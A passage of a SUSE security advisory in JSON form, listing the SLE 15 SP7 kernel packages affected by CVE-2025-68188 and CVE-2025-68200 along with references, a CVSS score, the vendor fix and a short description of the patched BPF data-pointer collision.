"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68188",
"url": "https://www.suse.com/security/cve/CVE-2025-68188"
},
{
"category": "external",
"summary": "SUSE Bug 1255269 for CVE-2025-68188",
"url": "https://bugzilla.suse.com/1255269"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68188"
},
{
"cve": "CVE-2025-68200",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68200"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Add bpf_prog_run_data_pointers()\n\nsyzbot found that cls_bpf_classify() is able to change\ntc_skb_cb(skb)-\u003edrop_reason triggering a warning in sk_skb_reason_drop().\n\nWARNING: CPU: 0 PID: 5965 at net/core/skbuff.c:1192 __sk_skb_reason_drop net/core/skbuff.c:1189 [inline]\nWARNING: CPU: 0 PID: 5965 at net/core/skbuff.c:1192 sk_skb_reason_drop+0x76/0x170 net/core/skbuff.c:1214\n\nstruct tc_skb_cb has been added in commit ec624fe740b4 (\"net/sched:\nExtend qdisc control block with tc control block\"), which added a wrong\ninteraction with db58ba459202 (\"bpf: wire in data and data_end for\ncls_act_bpf\").\n\ndrop_reason was added later.\n\nAdd bpf_prog_run_data_pointers() helper to save/restore the net_sched\nstorage colliding with BPF data_meta/data_end.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68200",
"url": "https://www.suse.com/security/cve/CVE-2025-68200"
},
{
"category": "external",
"summary": "SUSE Bug 1255241 for CVE-2025-68200",
"url": "https://bugzilla.suse.com/1255241"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
